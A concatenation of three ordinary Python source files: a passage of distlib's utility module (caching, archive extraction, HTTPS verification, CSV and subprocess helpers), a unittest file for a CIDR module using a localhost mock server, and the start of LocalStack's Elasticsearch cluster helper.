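#     e = get_export_entry('mycmd = mypkg.cli:main [extra1, extra2]')
#     # e.name   -> 'mycmd'
#     # e.prefix -> 'mypkg.cli'
#     # e.suffix -> 'main'
#     # e.flags  -> ['extra1', 'extra2']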
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.path.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
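# Illustrative sketch: with no suffix this typically resolves to something
# like '~/.distlib' on POSIX or '%LOCALAPPDATA%\.distlib' on Windows, falling
# back to a fresh temporary directory if that location is not writable.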
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
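# Illustrative sketch (POSIX): path_to_cache_dir('/home/user/project') returns
# '--home--user--project.cache'; on Windows, ':' in the drive (e.g. 'C:')
# becomes 'C---'.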
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
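# Illustrative sketch: split_filename('foo-bar-1.0.3-py2.7') would yield
# ('foo-bar', '1.0.3', '2.7'), while a filename with no '-pyX.Y' marker
# yields pyver None.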
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
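# Illustrative sketch: parse_name_and_version('foo (1.0)') returns
# ('foo', '1.0'); a string without the '(version)' part raises
# DistlibException.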
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
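# Illustrative sketch: get_extras(['*', '-tests'], ['docs', 'tests']) expands
# '*' to all available extras and then removes the negated one, giving
# {'docs'}; requesting an undeclared extra only logs a warning.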
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base):
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish an event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
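# Illustrative sketch of Sequencer (ordering inferred from get_steps() above):
#
#     seq = Sequencer()
#     seq.add('build', 'test')
#     seq.add('test', 'release')
#     # list(seq.get_steps('release')) -> ['build', 'test', 'release']
#     # seq.dot returns a Graphviz 'digraph G { ... }' description of the edges.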
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G', 'T', 'P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
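# Illustrative sketch: iglob('src/**/*.py') walks the tree under 'src' for
# .py files, and iglob('docs/{api,guide}/*.rst') expands the brace set into
# two ordinary globs; a '**' mixed directly with other characters raises
# ValueError.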
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
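# Illustrative sketch (build_opener comes from urllib2 / urllib.request, not
# from this module; the certificate path is a placeholder): an opener that
# verifies certificates and refuses plain HTTP might be built roughly as
#
#     handler = HTTPSOnlyHandler(ca_certs='/path/to/ca-bundle.pem')
#     opener = build_opener(handler)
#     opener.open('https://example.com/simple/')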
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
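# Illustrative sketch of the CSV helpers above (filenames and row values are
# placeholders):
#
#     with CSVWriter('RECORD') as writer:
#         writer.writerow(['pkg/__init__.py', 'sha256=deadbeef', '42'])
#     with CSVReader(path='RECORD') as reader:
#         for row in reader:
#             pass  # each row comes back as a list of text values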
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
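#
# Illustrative sketch (the class name and command are hypothetical): any class can
# mix SubprocessMixin in to have a child process's output streamed via reader():
#
#     class Fetcher(SubprocessMixin):
#         pass
#
#     Fetcher(verbose=True).run_command(['git', '--version'])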
|
test_cidr.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import os
import socket
import sys
import threading
import unittest
# Third party
import requests
import cidr
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
# Global Variables
mock_server_port = get_free_port()
# Override Urls to use Mock Test Urls
cidr.IPRANGE_URLS = {
"goog": "http://localhost:{}/ipranges/goog.json".format(mock_server_port),
"cloud": "http://localhost:{}/ipranges/cloud.json".format(mock_server_port),
}
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(requests.codes.ok)
self.send_header("Content-type", "text/html")
self.end_headers()
if self.path.endswith("goog.json"):
fname = "samplefiles/goog.json"
with open(fname) as fp:
self.wfile.write(bytes(fp.read(), "utf-8"))
elif self.path.endswith("cloud.json"):
fname = "samplefiles/cloud.json"
with open(fname) as fp:
self.wfile.write(bytes(fp.read(), "utf-8"))
else:
mock_page = [
"<html>",
"<head><title>Mock Test</title></head>",
"<body>",
"<p>This is a test page.</p>",
"You accessed path: {}",
"</body>",
"</html>",
]
self.wfile.write(bytes("".join(mock_page).format(self.path), "utf-8"))
return
class BaseClass(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Configure mock server.
cls.mock_server_port = mock_server_port
cls.mock_server = HTTPServer(
("localhost", cls.mock_server_port), MockServerRequestHandler
)
cls.mock_server_thread = threading.Thread(target=cls.mock_server.serve_forever)
        cls.mock_server_thread.daemon = True
cls.mock_server_thread.start()
print("Running Server")
def setup_method(self, test_method):
"""To setup mock values for http requests"""
os.environ["BUILD_SPECIFIC_GCLOUD_PROJECT"] = "random"
class TestHttpRequests(BaseClass):
def test_request_response(self):
url = "http://localhost:{port}/HealthCheck".format(port=mock_server_port)
# Send a request to the mock API server and store the response.
response = requests.get(url)
# Confirm that the request-response cycle completed successfully.
self.assertTrue(
response.ok, msg="Failed to run test server! Install dev-requirements.txt"
)
def test_goog_url(self):
output = cidr.read_url(cidr.IPRANGE_URLS["goog"])
with open("samplefiles/goog.json") as fp:
expected_output = json.loads(fp.read())
self.assertEqual(
sorted(output.items()),
sorted(expected_output.items()),
msg="Url Data Mistmatch!",
)
def test_cloud_url(self):
output = cidr.read_url(cidr.IPRANGE_URLS["cloud"])
with open("samplefiles/cloud.json") as fp:
expected_output = json.loads(fp.read())
self.assertEqual(
sorted(output.items()),
sorted(expected_output.items()),
msg="Url Data Mistmatch!",
)
def test_main(self):
try:
import StringIO as io
except ModuleNotFoundError:
import io
capturedOutput = io.StringIO()
sys.stdout = capturedOutput
cidr.main()
sys.stdout = sys.__stdout__
current_output = capturedOutput.getvalue().strip()
with open("samplefiles/output.txt") as fp:
expected_output = fp.read().strip()
self.assertEqual(
            set(expected_output) - set(current_output), set(), msg="Output Mismatch!"
)
if __name__ == "__main__":
unittest.main()
|
cluster.py
|
"""
Higher-level abstraction to start elasticsearch using the elasticsearch binary.
Here's how you can use it:
import time
import threading
cluster = ElasticsearchCluster(7541)
def monitor():
cluster.wait_is_up()
print('elasticsearch is up!', cluster.health())
threading.Thread(target=monitor, daemon=True).start()
try:
cluster.start()
cluster.join()
except KeyboardInterrupt:
cluster.shutdown()
finally:
print('ok, bye')
"""
import logging
import os
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import urlparse
import requests
from localstack import config, constants
from localstack.services import install
from localstack.services.generic_proxy import EndpointProxy
from localstack.services.infra import DEFAULT_BACKEND_HOST, start_proxy_for_service
from localstack.utils.common import (
ShellCommandThread,
chmod_r,
get_free_tcp_port,
is_root,
mkdir,
rm_rf,
)
from localstack.utils.run import FuncThread
from localstack.utils.serving import Server
LOG = logging.getLogger(__name__)
CommandSettings = Dict[str, str]
class Directories(NamedTuple):
install: str
tmp: str
mods: str
data: str
backup: str
def get_elasticsearch_health_status(url: str) -> Optional[str]:
"""
Queries the health endpoint of elasticsearch and returns either the status ('green', 'yellow',
...) or None if the response returned a non-200 response.
"""
resp = requests.get(url + "/_cluster/health")
if resp and resp.ok:
es_status = resp.json()
es_status = es_status["status"]
return es_status
return None
def resolve_directories(version: str, cluster_path: str, data_root: str = None) -> Directories:
"""
Determines directories to find the elasticsearch binary as well as where to store the instance data.
:param version: the elasticsearch version (to resolve the install dir)
:param cluster_path: the path between data_root and the actual data directories
:param data_root: the root of the data dir (will be resolved to TMP_PATH or DATA_DIR by default)
:returns: a Directories data structure
"""
# where to find elasticsearch binary and the modules
install_dir = install.get_elasticsearch_install_dir(version)
modules_dir = os.path.join(install_dir, "modules")
if data_root is None:
if config.dirs.data:
data_root = config.dirs.data
else:
data_root = config.dirs.tmp
data_path = os.path.join(data_root, "elasticsearch", cluster_path)
tmp_dir = os.path.join(data_path, "tmp")
data_dir = os.path.join(data_path, "data")
backup_dir = os.path.join(data_path, "backup")
return Directories(install_dir, tmp_dir, modules_dir, data_dir, backup_dir)
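# For illustration (paths are made up): resolve_directories("7.10.0", "es-domain",
# data_root="/var/lib/localstack") places tmp/data/backup under
# /var/lib/localstack/elasticsearch/es-domain/, while the install dir comes from
# install.get_elasticsearch_install_dir("7.10.0").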
def init_directories(dirs: Directories):
"""
Makes sure the directories exist and have the necessary permissions.
"""
LOG.debug("initializing elasticsearch directories %s", dirs)
chmod_r(dirs.install, 0o777)
if not dirs.data.startswith(config.dirs.data):
# only clear previous data if it's not in DATA_DIR
rm_rf(dirs.data)
rm_rf(dirs.tmp)
